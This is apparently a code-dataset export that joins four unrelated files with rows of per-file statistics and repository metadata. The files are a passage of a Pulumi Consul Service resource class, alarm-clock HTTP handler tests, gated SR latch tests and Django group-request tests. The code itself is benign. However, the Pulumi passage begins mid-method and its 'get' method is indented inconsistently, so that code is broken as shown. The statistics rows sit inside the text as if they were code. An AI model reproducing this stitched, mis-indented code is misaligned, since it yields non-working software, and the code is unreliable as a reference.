        # Fresh resource (not a lookup of an existing one): __props__ must
        # not be supplied by the caller in this case.
        if __props__ is not None:
            raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
        __props__ = ServiceArgs.__new__(ServiceArgs)

        __props__.__dict__["address"] = address
        __props__.__dict__["checks"] = checks
        __props__.__dict__["datacenter"] = datacenter
        __props__.__dict__["enable_tag_override"] = enable_tag_override
        if external is not None and not opts.urn:
            # Deprecated input: warn only on genuinely new resources
            # (opts.urn is set when rehydrating an existing one).
            warnings.warn("""The external field has been deprecated and does nothing.""", DeprecationWarning)
            pulumi.log.warn("""external is deprecated: The external field has been deprecated and does nothing.""")
        __props__.__dict__["external"] = external
        __props__.__dict__["meta"] = meta
        __props__.__dict__["name"] = name
        __props__.__dict__["namespace"] = namespace
        if node is None and not opts.urn:
            raise TypeError("Missing required property 'node'")
        __props__.__dict__["node"] = node
        __props__.__dict__["port"] = port
        __props__.__dict__["service_id"] = service_id
        __props__.__dict__["tags"] = tags
    super(Service, __self__).__init__(
        'consul:index/service:Service',
        resource_name,
        __props__,
        opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
address: Optional[pulumi.Input[str]] = None,
checks: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServiceCheckArgs']]]]] = None,
datacenter: Optional[pulumi.Input[str]] = None,
enable_tag_override: Optional[pulumi.Input[bool]] = None,
external: Optional[pulumi.Input[bool]] = None,
meta: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
name: Optional[pulumi.Input[str]] = None,
namespace: Optional[pulumi.Input[str]] = None,
node: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[int]] = None,
service_id: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None) -> 'Service':
"""
Get an existing Service resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] address: The address of the service. Defaults to the
address of the node.
:param pulumi.Input[str] datacenter: The datacenter to use. This overrides the
agent's default datacenter and the datacenter in the provider setup.
:param pulumi.Input[bool] enable_tag_override: Specifies to disable the
anti-entropy feature for this service's tags. Defaults to `false`.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] meta: A map of arbitrary KV metadata linked to the service
instance.
:param pulumi.Input[str] name: The name of the health-check.
:param pulumi.Input[str] namespace: The namespace to create the service within.
:param pulumi.Input[str] node: The name of the node the to register the service on.
:param pulumi.Input[int] port: The port of the service.
:param pulumi.Input[str] service_id: - If the service ID is not provided, it will be defaulted to the value
of the `name` attribute.
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A list of values that are opaque to Consul,
but can be used to distinguish between services or nodes.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ServiceState.__new__(_ServiceState)
__props__.__dict__["address"] = address
__props__.__dict__["checks"] = checks
__props__.__dict__["datacenter"] = datacenter
__props__.__dict__["enable_tag_override"] = enable_tag_override
__props__.__dict__["external"] = external
__props__.__dict__["meta"] = meta
__props__.__dict__["name"] = name
__props__.__dict__["namespace"] = namespace
__props__.__dict__["node"] = node
__props__.__dict__["port"] = port
__props__.__dict__["service_id"] = service_id
__props__.__dict__["tags"] = tags
return Service(resource_name, opts=opts, __props__=__props__)
    @property
    @pulumi.getter
    def address(self) -> pulumi.Output[str]:
        """
        The address of the service. Defaults to the
        address of the node when not set explicitly.
        """
        return pulumi.get(self, "address")
    @property
    @pulumi.getter
    def checks(self) -> pulumi.Output[Optional[Sequence['outputs.ServiceCheck']]]:
        """
        The health-check definitions associated with this service, if any.
        """
        return pulumi.get(self, "checks")
    @property
    @pulumi.getter
    def datacenter(self) -> pulumi.Output[str]:
        """
        The datacenter to use. This overrides the
        agent's default datacenter and the datacenter in the provider setup.
        """
        return pulumi.get(self, "datacenter")
    @property
    @pulumi.getter(name="enableTagOverride")
    def enable_tag_override(self) -> pulumi.Output[Optional[bool]]:
        """
        Specifies to disable the
        anti-entropy feature for this service's tags. Defaults to `false`.
        """
        return pulumi.get(self, "enable_tag_override")
    @property
    @pulumi.getter
    def external(self) -> pulumi.Output[Optional[bool]]:
        """
        Deprecated; this field does nothing (a deprecation warning is emitted
        when it is supplied at resource creation).
        """
        return pulumi.get(self, "external")
    @property
    @pulumi.getter
    def meta(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
        """
        A map of arbitrary KV metadata linked to the service
        instance.
        """
        return pulumi.get(self, "meta")
    @property
    @pulumi.getter
    def name(self) -> pulumi.Output[str]:
        """
        The name of the health-check.
        """
        return pulumi.get(self, "name")
    @property
    @pulumi.getter
    def namespace(self) -> pulumi.Output[Optional[str]]:
        """
        The namespace to create the service within.
        """
        return pulumi.get(self, "namespace")
    @property
    @pulumi.getter
    def node(self) -> pulumi.Output[str]:
        """
        The name of the node the to register the service on.
        """
        return pulumi.get(self, "node")
    @property
    @pulumi.getter
    def port(self) -> pulumi.Output[Optional[int]]:
        """
        The port of the service.
        """
        return pulumi.get(self, "port")
    @property
    @pulumi.getter(name="serviceId")
    def service_id(self) -> pulumi.Output[str]:
        """
        If the service ID is not provided, it will be defaulted to the value
        of the `name` attribute.
        """
        return pulumi.get(self, "service_id")
    @property
    @pulumi.getter
    def tags(self) -> pulumi.Output[Optional[Sequence[str]]]:
        """
        A list of values that are opaque to Consul,
        but can be used to distinguish between services or nodes.
        """
        return pulumi.get(self, "tags")
| 39.833536
| 134
| 0.607144
| 3,826
| 32,783
| 5.059854
| 0.066649
| 0.106255
| 0.076657
| 0.057958
| 0.913529
| 0.896276
| 0.876595
| 0.870706
| 0.866419
| 0.862854
| 0
| 0.001322
| 0.284934
| 32,783
| 822
| 135
| 39.881995
| 0.824503
| 0.33676
| 0
| 0.848921
| 1
| 0
| 0.08753
| 0.001448
| 0
| 0
| 0
| 0
| 0
| 1
| 0.160671
| false
| 0.002398
| 0.016787
| 0.014388
| 0.273381
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
69c760b48e8ab047499cd1efa24eea943c69e8bf
| 9,689
|
py
|
Python
|
tests/test_http.py
|
dubaleeiro/mopidy-alarmclock
|
19bf94b4747be1d363859a3de8cf7ca001e03537
|
[
"Apache-2.0"
] | null | null | null |
tests/test_http.py
|
dubaleeiro/mopidy-alarmclock
|
19bf94b4747be1d363859a3de8cf7ca001e03537
|
[
"Apache-2.0"
] | null | null | null |
tests/test_http.py
|
dubaleeiro/mopidy-alarmclock
|
19bf94b4747be1d363859a3de8cf7ca001e03537
|
[
"Apache-2.0"
] | 3
|
2017-04-06T14:03:15.000Z
|
2020-12-27T11:56:16.000Z
|
from __future__ import unicode_literals
import datetime
import unittest
from freezegun import freeze_time
import mock
from mopidy_alarmclock import http
class HttpTest(unittest.TestCase):
    """Unit tests for the HTTP request handlers of mopidy_alarmclock.

    The handlers' Tornado base class is patched out with a Mock so the
    handlers can be instantiated without a real application/request.
    """

    @staticmethod
    def _cleanup(alarm_manager, handler, msg_store):
        """Reset the mocks and the message store between sub-cases."""
        alarm_manager.reset_mock()
        handler.redirect.reset_mock()
        msg_store.msg_code = None

    @freeze_time("2015-05-03 07:17:53")
    def test_SetAlarmRequestHandler(self):
        config = mock.Mock()
        core = mock.Mock()
        alarm_manager = mock.Mock()
        msg_store = http.MessageStore()
        # Replace the Tornado base class so the handler needs no real server.
        patcher = mock.patch.object(http.SetAlarmRequestHandler, '__bases__', (mock.Mock,))
        with patcher:
            patcher.is_local = True
            handler = http.SetAlarmRequestHandler()
            handler.initialize(config, core, alarm_manager, msg_store)
            handler.redirect = mock.Mock()
            handler.get_argument = mock.Mock()

            def submit(**fields):
                # Simulate a form POST: get_argument(name, default) returns
                # the supplied field, or the handler's default when omitted.
                handler.get_argument.side_effect = lambda v, d, f=fields: f.get(v, d)
                handler.post()

            # Test 1 - every field given explicitly.
            submit(playlist='Playlist URI', time='8:00', random='1', volume='81', incsec='23')
            # NOTE: fixed py3-incompatible leading-zero literals (05 -> 5, 03 -> 3).
            alarm_manager.set_alarm.assert_called_once_with(
                datetime.datetime(2015, 5, 3, 8, 0), 'Playlist URI', True, 81, 23)
            self.assertEqual(msg_store.msg_code, 'ok')
            handler.redirect.assert_called_once_with('/alarmclock/')
            self._cleanup(alarm_manager, handler, msg_store)

            # Test 2 - defaults, H:M time format; 05:7 is already past the
            # frozen clock, so the alarm lands on the next day.
            # WARNING! Default configuration must be also updated in README.rst and ext.conf
            # WARNING! Internal defaults of volume and volume increase seconds are in SetAlarmRequestHandler of http.py
            submit(playlist='Playlist URI', time='05:7')
            alarm_manager.set_alarm.assert_called_once_with(
                datetime.datetime(2015, 5, 4, 5, 7), 'Playlist URI', False, 100, 30)
            self.assertEqual(msg_store.msg_code, 'ok')
            handler.redirect.assert_called_once_with('/alarmclock/')
            self._cleanup(alarm_manager, handler, msg_store)

            # Test 3 - out-of-range values (low) fall back to defaults.
            # WARNING! Default configuration (AND RANGES) must be also updated in README.rst and ext.conf
            # WARNING! Internal defaults of volume and volume increase seconds are in SetAlarmRequestHandler of http.py
            # WARNING! Ranges of volume and volume increase seconds are in SetAlarmRequestHandler of http.py AND HTML form of index.html
            submit(playlist='Playlist URI', time='23:59', random='1', volume='0', incsec='-1')
            alarm_manager.set_alarm.assert_called_once_with(
                datetime.datetime(2015, 5, 3, 23, 59), 'Playlist URI', True, 100, 30)
            self.assertEqual(msg_store.msg_code, 'ok')
            handler.redirect.assert_called_once_with('/alarmclock/')
            self._cleanup(alarm_manager, handler, msg_store)

            # Test 4 - out-of-range values (high) fall back to defaults.
            submit(playlist='Playlist URI', time='0:0', random='1', volume='101', incsec='301')
            alarm_manager.set_alarm.assert_called_once_with(
                datetime.datetime(2015, 5, 4, 0, 0), 'Playlist URI', True, 100, 30)
            self.assertEqual(msg_store.msg_code, 'ok')
            handler.redirect.assert_called_once_with('/alarmclock/')
            self._cleanup(alarm_manager, handler, msg_store)

            # Tests 5-13 - invalid time formats must be rejected without
            # setting an alarm.
            for bad_time in ('a8:00', '8:00a', '8:0a0', '800', '8_00', '', 'a', '24:00', '8:60'):
                submit(playlist='Playlist URI', time=bad_time, random='1', volume='81', incsec='23')
                self.assertFalse(alarm_manager.set_alarm.called)
                self.assertEqual(msg_store.msg_code, 'format')
                handler.redirect.assert_called_once_with('/alarmclock/')
                self._cleanup(alarm_manager, handler, msg_store)

            # Test 14 - missing time: get_argument returns the handler's
            # default (presumably None), which the handler fails to parse.
            with self.assertRaises(TypeError):
                submit(playlist='Playlist URI', random='1', volume='81', incsec='23')
            self.assertFalse(alarm_manager.set_alarm.called)

    def test_CancelAlarmRequestHandler(self):
        alarm_manager = mock.Mock()
        msg_store = http.MessageStore()
        patcher = mock.patch.object(http.CancelAlarmRequestHandler, '__bases__', (mock.Mock,))
        with patcher:
            patcher.is_local = True
            handler = http.CancelAlarmRequestHandler()
            handler.initialize(None, None, alarm_manager, msg_store)
            handler.redirect = mock.Mock()
            handler.get()
            # Cancelling must hit the manager, record the message, and redirect.
            alarm_manager.cancel.assert_called_once_with()
            self.assertEqual(msg_store.msg_code, 'cancel')
            handler.redirect.assert_called_once_with('/alarmclock/')
# TODO Use Tornado unit testing
# TODO Write more (granular + comprehensive) tests
| 38.911647
| 151
| 0.648571
| 1,191
| 9,689
| 5.077246
| 0.119228
| 0.063503
| 0.049115
| 0.066975
| 0.875145
| 0.875145
| 0.863734
| 0.852323
| 0.852323
| 0.843724
| 0
| 0.025702
| 0.224997
| 9,689
| 248
| 152
| 39.068548
| 0.779598
| 0.143771
| 0
| 0.70922
| 0
| 0
| 0.12388
| 0
| 0
| 0
| 0
| 0.004032
| 0.312057
| 0
| null | null | 0
| 0.042553
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
69ec8590916aa544a8b888cefdcb9012f14a13a5
| 3,052
|
py
|
Python
|
tests/storage/test_GatedSRLatch.py
|
jamesjiang52/Bitwise
|
c71f151d23034b3f9e2a939f637be0eaa16c45c3
|
[
"MIT"
] | null | null | null |
tests/storage/test_GatedSRLatch.py
|
jamesjiang52/Bitwise
|
c71f151d23034b3f9e2a939f637be0eaa16c45c3
|
[
"MIT"
] | null | null | null |
tests/storage/test_GatedSRLatch.py
|
jamesjiang52/Bitwise
|
c71f151d23034b3f9e2a939f637be0eaa16c45c3
|
[
"MIT"
] | null | null | null |
import bitwise as bw
class TestGatedSRLatch:
    """Behavioral test of the gated (clocked) SR latch."""

    def test_GatedSRLatch(self):
        clock = bw.wire.Wire()
        set_ = bw.wire.Wire()
        reset = bw.wire.Wire()
        output = bw.wire.Wire()
        output_not = bw.wire.Wire()
        a = bw.storage.GatedSRLatch(set_, reset, clock, output, output_not)

        def drive(clk, s, r, expected_q, expected_q_not):
            # Apply inputs in the same order as before (clock, set, reset),
            # then check both outputs.
            clock.value = clk
            set_.value = s
            reset.value = r
            assert output.value == expected_q
            assert output_not.value == expected_q_not

        # (clock, set, reset, Q, ~Q) applied sequentially; set/reset only
        # take effect while the clock is high.
        for vector in [
            (1, 0, 1, 0, 1),
            (1, 0, 0, 0, 1),
            (1, 1, 0, 1, 0),
            (1, 0, 0, 1, 0),
            (1, 0, 1, 0, 1),
            (0, 0, 1, 0, 1),
            (0, 0, 0, 0, 1),
            (0, 1, 0, 0, 1),
            (0, 0, 0, 0, 1),
            (0, 1, 0, 0, 1),
            (1, 1, 0, 1, 0),
            (0, 1, 0, 1, 0),
            (0, 0, 0, 1, 0),
            (0, 0, 1, 1, 0),
            (0, 0, 0, 1, 0),
            (0, 0, 1, 1, 0),
            (1, 0, 1, 0, 1),
            (1, 0, 0, 0, 1),
        ]:
            drive(*vector)

        print(a.__doc__)
        print(a)
        a(set=1, reset=0, clock=1, output=None, output_not=None)
        assert output.value == 1
        assert output_not.value == 0
| 23.84375
| 75
| 0.52097
| 391
| 3,052
| 3.946292
| 0.063939
| 0.209981
| 0.171095
| 0.256643
| 0.841866
| 0.841866
| 0.841866
| 0.841866
| 0.841866
| 0.816591
| 0
| 0.050911
| 0.388598
| 3,052
| 127
| 76
| 24.031496
| 0.775991
| 0
| 0
| 0.884615
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.365385
| 1
| 0.009615
| false
| 0
| 0.009615
| 0
| 0.028846
| 0.019231
| 0
| 0
| 0
| null | 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
38a5d2442b10637ad4381cc22fa97e33c07a0adc
| 16,998
|
py
|
Python
|
app/group_requests/tests.py
|
porowns/Krypted-Auth
|
ed171bfbd1c98a4c171ddf6a20b18691330b1646
|
[
"MIT"
] | 6
|
2017-12-13T21:53:05.000Z
|
2018-10-04T02:47:05.000Z
|
app/group_requests/tests.py
|
porowns/Krypted-Auth
|
ed171bfbd1c98a4c171ddf6a20b18691330b1646
|
[
"MIT"
] | 106
|
2019-08-11T23:00:39.000Z
|
2021-06-10T19:45:54.000Z
|
app/group_requests/tests.py
|
KryptedGaming/kryptedauth
|
ed171bfbd1c98a4c171ddf6a20b18691330b1646
|
[
"MIT"
] | 10
|
2020-01-18T11:28:44.000Z
|
2022-02-21T06:08:39.000Z
|
from django.test import TestCase
from django.urls import reverse_lazy, reverse
from django.apps import apps
from unittest import skipIf
from django.contrib.auth.models import User, Group, Permission
from django.core.exceptions import PermissionDenied
from .models import GroupRequest, OpenGroup, ClosedGroup
class GroupRequestDefaultTestCase(TestCase):
    """Group-request behaviour when django_eveonline_group_states is absent."""

    @staticmethod
    def get_user():
        # Fixture user created in setUp().
        return User.objects.get(username="GroupTest")

    def setUp(self):
        # These cases only apply when the group-states app is NOT installed.
        if apps.is_installed('django_eveonline_group_states'):
            return
        User.objects.create_user(username="GroupTest",
                                 password="TestPassword",
                                 email="test@kryptedgaming.com")
        # One plain group, one open group, one closed group.
        Group.objects.create(name="GROUP A")
        open_grp = Group.objects.create(name="OPEN GROUP")
        closed_grp = Group.objects.create(name="CLOSED GROUP")
        OpenGroup.objects.create(group=open_grp)
        ClosedGroup.objects.create(group=closed_grp)

    @skipIf(apps.is_installed('django_eveonline_group_states'), "Skipping base unit test(s) due to django_eveonline_group_states")
    def test_view_groups(self):
        url = reverse_lazy('group-list')
        # Anonymous access redirects to login.
        self.assertTrue(self.client.get(url).status_code == 302)
        # Authenticated users get the group listing.
        self.client.login(username="GroupTest", password="TestPassword")
        response = self.client.get(url)
        self.assertTrue(response.status_code == 200)
        for group_name, is_open in (("GROUP A", False), ("OPEN GROUP", True)):
            expected = {
                "group": Group.objects.get(name=group_name),
                "open": is_open,
                "requested": None,
                "request_count": 0,
            }
            self.assertTrue(expected in response.context['groups'])

    @skipIf(apps.is_installed('django_eveonline_group_states'), "Skipping base unit test(s) due to django_eveonline_group_states")
    def test_request_group_success(self):
        target = Group.objects.get(name="GROUP A")
        url = reverse_lazy('group-request', args=(target.pk,))
        # Anonymous access redirects to login.
        self.assertTrue(self.client.get(url).status_code == 302)
        self.client.login(username="GroupTest", password="TestPassword")
        response = self.client.get(url, follow=True)
        self.assertTrue(response.status_code == 200)
        # A pending request must now exist for this user/group.
        self.assertTrue(GroupRequest.objects.filter(
            request_user=self.get_user(),
            request_group__pk=target.pk,
            response_action="PENDING").exists()
        )

    @skipIf(apps.is_installed('django_eveonline_group_states'), "Skipping base unit test(s) due to django_eveonline_group_states")
    def test_request_group_success_open_group(self):
        target = Group.objects.get(name="OPEN GROUP")
        url = reverse_lazy('group-request', args=(target.pk,))
        # Anonymous access redirects to login.
        self.assertTrue(self.client.get(url).status_code == 302)
        self.client.login(username="GroupTest", password="TestPassword")
        response = self.client.get(url, follow=True)
        self.assertTrue(response.status_code == 200)
        # Open groups are auto-accepted and the user joins immediately.
        self.assertTrue(GroupRequest.objects.filter(
            request_user=self.get_user(),
            request_group__pk=target.pk,
            response_action="ACCEPTED").exists()
        )
        self.assertTrue(target in self.get_user().groups.all())

    @skipIf(apps.is_installed('django_eveonline_group_states'), "Skipping base unit test(s) due to django_eveonline_group_states")
    def test_request_group_failure(self):
        target = Group.objects.get(name="CLOSED GROUP")
        url = reverse_lazy('group-request', args=(target.pk,))
        # Anonymous access redirects to login.
        self.assertTrue(self.client.get(url).status_code == 302)
        self.client.login(username="GroupTest", password="TestPassword")
        response = self.client.get(url, follow=True)
        self.assertTrue(response.status_code == 200)
        # Closed groups must not produce a pending request.
        self.assertFalse(GroupRequest.objects.filter(
            request_user=self.get_user(),
            request_group__pk=target.pk,
            response_action="PENDING").exists()
        )
        self.assertTrue(str(list(response.context['messages'])[0]) == "You do not have access to request that group.")
class GroupRequestWithGroupStatesTestCase(TestCase):
    """Group-request behaviour when django_eveonline_group_states IS installed.

    Mirrors GroupRequestDefaultTestCase, but group visibility/eligibility is
    driven by the user's EveUserState rather than the plain Open/Closed flags.
    """
    @staticmethod
    def get_user():
        # Fixture user created in setUp().
        return User.objects.get(username="GroupTest")
    def setUp(self):
        # These cases are only meaningful when the group-states app is present.
        if not apps.is_installed('django_eveonline_group_states'):
            return
        # Imported lazily so this module still loads when the app is absent.
        from django_eveonline_group_states.models import EveGroupState, EveUserState
        group_a = Group.objects.create(name="GROUP A")
        open_group = Group.objects.create(name="OPEN GROUP")
        unknown_open_group = Group.objects.create(name="UNASSIGNED OPEN GROUP")
        closed_group = Group.objects.create(name="CLOSED GROUP")
        unknown_closed_group = Group.objects.create(name="UNASSIGNED CLOSED GROUP")
        OpenGroup.objects.create(group=open_group)
        ClosedGroup.objects.create(group=closed_group)
        # The "UNASSIGNED" groups are open/closed but deliberately NOT attached
        # to the user's state below, so they should not be offered to the user.
        OpenGroup.objects.create(group=unknown_open_group)
        ClosedGroup.objects.create(group=unknown_closed_group)
        user = User.objects.create_user(username="GroupTest",
                                        password="TestPassword",
                                        email="test@kryptedgaming.com")
        state = EveGroupState.objects.create(
            name="Default",
            priority=-1,
        )
        state.default_groups.add(group_a)
        state.enabling_groups.add(open_group)
        state.enabling_groups.add(closed_group)
        EveUserState(
            user=user,
            state=state
        ).save()
    @skipIf(not apps.is_installed('django_eveonline_group_states'), "Skipping specialized test(s) due to django_eveonline_group_states")
    def test_view_groups_with_group_states(self):
        url = reverse_lazy('group-list')
        response = self.client.get(url)
        # Anonymous access redirects to login.
        self.assertTrue(response.status_code == 302)
        # test successful access
        self.client.login(username="GroupTest", password="TestPassword")
        response = self.client.get(url)
        self.assertTrue(response.status_code == 200)
        # Groups attached to the user's state are listed...
        expected_result = {
            "group": Group.objects.get(name="GROUP A"),
            "open": False,
        }
        self.assertTrue(expected_result in response.context['groups'])
        expected_result = {
            "group": Group.objects.get(name="OPEN GROUP"),
            "open": True,
        }
        self.assertTrue(expected_result in response.context['groups'])
        # ...while groups outside the state are not.
        expected_result = {
            "group": Group.objects.get(name="UNASSIGNED OPEN GROUP"),
            "open": True,
        }
        self.assertTrue(expected_result not in response.context['groups'])
        # NOTE(review): "open" is True here although the group is CLOSED; a
        # "not in" check passes trivially for any dict that never occurs in
        # the context -- confirm the intended flag value.
        expected_result = {
            "group": Group.objects.get(name="CLOSED GROUP"),
            "open": True,
        }
        self.assertTrue(expected_result not in response.context['groups'])
    @skipIf(not apps.is_installed('django_eveonline_group_states'), "Skipping specialized test(s) due to django_eveonline_group_states")
    def test_request_group_with_group_states(self):
        successful_group=Group.objects.get(name="GROUP A")
        url = reverse_lazy('group-request', args=(successful_group.pk,))
        response = self.client.get(url)
        # Anonymous access redirects to login.
        self.assertTrue(response.status_code == 302)
        # test successful access
        self.client.login(username="GroupTest", password="TestPassword")
        response = self.client.get(url, follow=True)
        self.assertTrue(response.status_code == 200)
        # verify group request exists
        self.assertTrue(GroupRequest.objects.filter(
            request_user=self.get_user(),
            request_group__pk=successful_group.pk,
            response_action="PENDING").exists()
        )
    @skipIf(not apps.is_installed('django_eveonline_group_states'), "Skipping specialized test(s) due to django_eveonline_group_states")
    def test_request_group_with_group_states_open_group(self):
        successful_group=Group.objects.get(name="OPEN GROUP")
        url = reverse_lazy('group-request', args=(successful_group.pk,))
        response = self.client.get(url)
        # Anonymous access redirects to login.
        self.assertTrue(response.status_code == 302)
        # test successful access
        self.client.login(username="GroupTest", password="TestPassword")
        response = self.client.get(url, follow=True)
        self.assertTrue(response.status_code == 200)
        # verify group request exists (open groups are auto-accepted)
        self.assertTrue(GroupRequest.objects.filter(
            request_user=self.get_user(),
            request_group__pk=successful_group.pk,
            response_action="ACCEPTED").exists()
        )
        self.assertTrue(successful_group in self.get_user().groups.all())
    # NOTE(review): skip reason below says "base unit test(s)" although this
    # is a specialized group-states test -- looks like a copy-paste slip.
    @skipIf(not apps.is_installed('django_eveonline_group_states'), "Skipping base unit test(s) due to django_eveonline_group_states")
    def test_request_group_with_group_states_open_group_not_in_state(self):
        unsuccessful_group=Group.objects.get(name="UNASSIGNED OPEN GROUP")
        url = reverse_lazy('group-request', args=(unsuccessful_group.pk,))
        response = self.client.get(url)
        # Anonymous access redirects to login.
        self.assertTrue(response.status_code == 302)
        # test successful access
        self.client.login(username="GroupTest", password="TestPassword")
        response = self.client.get(url, follow=True)
        self.assertTrue(response.status_code == 200)
        # verify group request exists
        self.assertFalse(GroupRequest.objects.filter(
            request_user=self.get_user(),
            request_group__pk=unsuccessful_group.pk,
            response_action="PENDING").exists()
        )
        self.assertTrue(str(list(response.context['messages'])[0]) == "You do not have access to request that group.")
class GroupRequestAdministrationTestCase(TestCase):
@staticmethod
def get_user():
return User.objects.get(username="GroupTest")
def setUp(self):
group = Group.objects.create(name="GROUP")
admin = User.objects.create_user(username="GroupAdmin",
password="TestPassword",
email="test@kryptedgaming.com",
)
manager = User.objects.create_user(username="GroupManager",
password="TestPassword",
email="test@kryptedgaming.com")
Permission.objects.get(codename="view_grouprequest").user_set.add(manager)
Permission.objects.get(codename="change_grouprequest").user_set.add(manager)
Permission.objects.get(codename="view_grouprequest").user_set.add(admin)
Permission.objects.get(codename="change_grouprequest").user_set.add(admin)
Permission.objects.get(codename="bypass_group_requirement").user_set.add(admin)
user_1 = User.objects.create_user(username="User1",
password="TestPassword",
email="test@kryptedgaming.com")
user_2 = User.objects.create_user(username="User2",
password="TestPassword",
email="test@kryptedgaming.com")
GroupRequest(
request_user=user_1,
request_group=group,
).save()
GroupRequest(
request_user=user_2,
request_group=group,
).save()
def test_view_group_request_as_admin(self):
user = User.objects.get(username="GroupAdmin")
group_pk = Group.objects.get(name="GROUP").pk
# test redirect
url = reverse_lazy('group-request-list', args=(group_pk,))
response = self.client.get(url)
self.assertTrue(response.status_code == 302)
# test successful access
self.client.login(username="GroupAdmin", password="TestPassword")
response = self.client.get(url, follow=True)
self.assertTrue(response.status_code == 200)
self.assertTrue(response.context['group_requests'].count() == 2)
def test_view_group_request_as_manager(self):
user = User.objects.get(username="GroupManager")
group = Group.objects.get(name="GROUP")
# test redirect
url = reverse_lazy('group-request-list', args=(group.pk,))
response = self.client.get(url)
self.assertTrue(response.status_code == 302)
# test rejected access
self.client.login(username="GroupManager", password="TestPassword")
response = self.client.get(url)
self.assertTrue(response.status_code != 200)
user.groups.add(group)
response = self.client.get(url)
self.assertTrue(response.status_code == 200)
self.assertTrue(response.context['group_requests'].count() == 2)
user.groups.remove(group)
def test_approve_group_request_as_admin(self):
user = User.objects.get(username="GroupAdmin")
group_pk = Group.objects.get(name="GROUP").pk
group_request_pk = GroupRequest.objects.all()[0].pk
# test redirect
url = reverse_lazy('group-request-approve', args=(group_pk, group_request_pk,))
response = self.client.get(url)
self.assertTrue(response.status_code == 302)
# test successful access
self.client.login(username="GroupAdmin", password="TestPassword")
response = self.client.get(url, follow=True)
self.assertTrue(response.status_code == 200)
gr = GroupRequest.objects.get(pk=1)
self.assertTrue(gr.response_action == "ACCEPTED")
self.assertTrue(gr.request_group in gr.request_user.groups.all())
def test_deny_group_request_as_admin(self):
user = User.objects.get(username="GroupAdmin")
group_pk = Group.objects.get(name="GROUP").pk
group_request_pk = GroupRequest.objects.all()[0].pk
# test redirect
url = reverse_lazy('group-request-deny', args=(group_pk, group_request_pk,))
response = self.client.get(url)
self.assertTrue(response.status_code == 302)
# test successful access
self.client.login(username="GroupAdmin", password="TestPassword")
response = self.client.get(url, follow=True)
gr = GroupRequest.objects.get(pk=1)
self.assertTrue(response.status_code == 200)
self.assertTrue(gr.response_action == "REJECTED")
self.assertTrue(gr.request_group not in gr.request_user.groups.all())
def test_approve_group_request_as_manager(self):
user = User.objects.get(username="GroupManager")
group = Group.objects.get(name="GROUP")
group_request_pk = GroupRequest.objects.all()[0].pk
# test redirect
url = reverse_lazy('group-request-approve', args=(group.pk, group_request_pk,))
response = self.client.get(url)
self.assertTrue(response.status_code == 302)
# test fail
self.client.login(username="GroupManager", password="TestPassword")
response = self.client.get(url)
gr = GroupRequest.objects.get(pk=1)
self.assertTrue(gr.response_action != "ACCEPTED")
self.assertTrue(gr.request_group not in gr.request_user.groups.all())
# test success
user.groups.add(group)
response = self.client.get(url, follow=True)
self.assertTrue(response.status_code == 200)
gr = GroupRequest.objects.get(pk=1)
self.assertTrue(gr.response_action == "ACCEPTED")
self.assertTrue(gr.request_group in gr.request_user.groups.all())
def test_deny_group_request_as_manager(self):
    """A manager can deny a group request only after joining the group.

    Covers three states: anonymous (redirect), authenticated but not a
    group member (denial silently not applied), and group member
    (request REJECTED and requester kept out of the group).
    """
    user = User.objects.get(username="GroupManager")
    group = Group.objects.get(name="GROUP")
    group_request_pk = GroupRequest.objects.all()[0].pk
    url = reverse_lazy('group-request-deny', args=(group.pk, group_request_pk))
    # Anonymous access must redirect to the login page.
    response = self.client.get(url)
    self.assertEqual(response.status_code, 302)
    # Manager is not yet a member of the group: denial must not happen.
    self.client.login(username="GroupManager", password="TestPassword")
    self.client.get(url)
    gr = GroupRequest.objects.get(pk=group_request_pk)
    self.assertNotEqual(gr.response_action, "REJECTED")
    # After joining the group, the manager can deny the request.
    user.groups.add(group)
    response = self.client.get(url, follow=True)
    self.assertEqual(response.status_code, 200)
    gr = GroupRequest.objects.get(pk=group_request_pk)
    self.assertEqual(gr.response_action, "REJECTED")
    self.assertNotIn(gr.request_group, gr.request_user.groups.all())
| 41.661765
| 136
| 0.663019
| 1,956
| 16,998
| 5.585378
| 0.070041
| 0.071762
| 0.051076
| 0.059588
| 0.917895
| 0.903799
| 0.869748
| 0.863524
| 0.84357
| 0.817025
| 0
| 0.008326
| 0.222732
| 16,998
| 407
| 137
| 41.764128
| 0.818574
| 0.033592
| 0
| 0.727273
| 0
| 0
| 0.146316
| 0.043913
| 0
| 0
| 0
| 0
| 0.188312
| 1
| 0.064935
| false
| 0.068182
| 0.025974
| 0.00974
| 0.116883
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
